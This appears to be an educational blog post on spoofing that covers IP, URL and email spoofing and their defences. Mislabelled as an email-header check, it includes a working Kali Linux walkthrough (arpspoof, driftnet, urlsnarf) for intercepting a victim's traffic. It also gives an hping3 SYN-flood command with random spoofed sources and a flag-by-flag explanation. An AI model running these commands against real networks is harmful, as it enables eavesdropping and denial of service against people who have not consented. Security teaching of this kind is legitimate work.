Spoofing

Spoofing

1)      Definition - What does Spoofing mean?

Spoofing, in general, is a fraudulent or malicious practice in which communication is sent from an unknown source disguised as a source known to the receiver. Spoofing is most prevalent in communication mechanisms that lack a high level of security. In short Spoofing is "The False Digital Identity “.

2)      Types of Spoofing

2.1        IP Spoofing

Internet Protocol (IP) is the protocol used for transmitting messages over the Internet; it is a network protocol operating at layer 3 of the OSI model. IP spoofing is the act of manipulated the headers in a transmitted message to mask a hackers true identity so that the message could appear as though it is from a trusted source.

2.1.1  Man-in-the-Middle attack

In a Man-in-the-Middle attack, the message sent to a recipient is intercepted by a third-party which manipulates the packets and resends it own message.

2.1.2  Denial of Service (DoS) Attack

A DoS attack is when a attacker floods a system with more packets than its resources can handle. This then causes the system to overload and shut down. The source address is spoofed making it difficult to track from where the attacks are taking place.

2.1.3  Solutions

IP spoofing can be prevented by monitoring packets using network monitoring software. A filtering router could also be installed, on the router an ACL (access control list) is needed to block private addresses on your downstream interface. On the upstream interface source address originating outside of the IP valid range will be blocked from sending spoofed information.

2.2        URL Spoofing

URL spoofing occurs when one website appears as if it is another. The URL that is displayed is not the real URL of the site, therefore the information is sent to a hidden web address.

2.2.1  Intrusion

URL spoofing is sometimes used to direct a user to a fraudulent site and by giving the site the same look and feel as the original site the user attempts to login with a username and password. The hacker collects the username and password then displays a password error and directs the user to the legitimate site. Using this technique the hacker could create a series of fake websites and steal a user's private information unknowingly.

2.2.2  URL Spoofing - Solutions 

Security patches are released by web browsers which add the feature of revealing the "true" URL of a site in the web browser. It is important to check if your internet browser is vulnerable and to perform the necessary updates.

2.3        Email Spoofing

 Email spoofing is the act of altering the header of an email so that the email appears to be sent from someone else

2.3.1  Email Spoofing – Attacks

  • Cause confusion or discredit a person
  • Social Engineering (phishing)
  • Hide identity of the sender (spamming)

2.3.2  Email Spoofing – Solutions

2.3.2.1    Check the content of the email:

  • Is the content weird in some way, or really unexpected from the sender?
  • Does it contain a form?
  • Does it request to either confirm or update login or any kind of information?

2.3.2.2    Check the header of the email

This is the simple scenario, and I try to draw it in a picture.

  • Victim ---à Attacker -à Router
  • Victim IP address : 192.168.1.90
  • Attacker network interface : eth0; with IP address : 192.168.1.93
  • Router IP address : 192.168.1.1

2.3.2.3    Requirements:

  • Kali Linux
    • Arpspoof
    • Driftnet
    • Urlsnarf

2.3.2.4    Steps for Arpspoof :

  • Open the terminal in Kali linux.
  • Enable IP forwrding in your machine.  
#   echo 1 > /proc/sys/net/ipv4/ip_forward
  • setting up arpspoof between victim and router.           
# arpspoof –i eth0 –t 192.168.1.90 192.168.1.1
  • After then setting up arpspoof from to capture all packet from router to victim.
#arpspoof –I eth0 –t 192.168.1.1 192.168.1.90
  • After step three and four, now all the packet sent or received by victim should be going through attacker machine.
  • Now we can try to use driftnet to monitor all victim image traffic. According to its website,

Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.

2.3.2.5    Steps for driftnet:

  • Run driftnet
# driftnet – i eth0
  • When victim browse a website with image, driftnet will capture all image traffic . Now we can try to use driftnet to monitor all victim image traffic. According to its website,

Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.

  • To stop driftnet, just close the driftnet window or press CTRL + C in the terminal.
  • For the next step we will try to capture the website information/data by using urlsnarf.

2.3.2.6    Steps for driftnet Urlsnarf:

  • Just run this command:
# urlsnarf -i eth0

and urlsnarf will start capturing all website address visited by victim machine.

  • When victim browse a website, attacker will know the address victim visited.

2.4        URL Spoofing [ Site Cloning] , Example

  • http://techsolutionpoint/2017/06/19/%e0%a6%ab%e0%a6%bf%e0%a6%b6%e0%a6%bf%e0%a6%82-phishing/

2.5        DoS Attack – Example

  • In computing, a denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users.
  • DoS using hping3 with random source IP
    root@kali:~# hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source 192.168.1.80

2.5.1  Let me explain the syntax’s used in this command:

  • hping3 = Name of the application binary.
  • -c 100000 = Number of packets to send.
  • -d 120 = Size of each packet that was sent to target machine.
  • -S = I am sending SYN packets only.
  • -w 64 = TCP window size.
  • -p 21 = Destination port (21 being FTP port). You can use any port here.
  • --flood = Sending packets as fast as possible, without taking care to show incoming replies. Flood mode.
  • --rand-source = Using Random Source IP Addresses. You can also use -a or –spoof to hide hostnames. See MAN page below.
  • 168.1.80 = Destination IP address

So how do you know it’s working? In hping3 flood mode, we don’t check replies received (actually you can’t because in this command we’ve used –rand-source flag which means the source IP address is not yours anymore.

Took me just 5 minutes to completely make this machine unresponsive (that’s the definition of DoS – Denial of Service).

In short, if this machine was a Web server, it wouldn’t be able to respond to any new connections and even if it could, it would be really slow.



Abul Faeze Mohammad Bakabillah (Russell)

Abul Faeze Mohammad Bakabillah (Russell)

I am A. F. M Bakabillah . Working as an ICT Consultant since 2008 in a Project ( IsDB-BISEW IT Scholarship Programme ) . Along with MTCNA and MTCRE I am Also MCP, MCSA, MCSA: Messaging, RHCE, ITIL & CEH Certified . I am experienced in Routing (Static, OSPF & BGP), VPN and Tunneling (IPSec, PPtP, L2TP, EoIP), Firewall (Filter, NAT, Mangle) , Bandwidth Management, PPPoE, Policy Routing.

Comments 0


There are no comments yet.
Your message is required.

linux-runlevels

LINUX Runlevels

sumanbd77 | 03/25/2020 00:30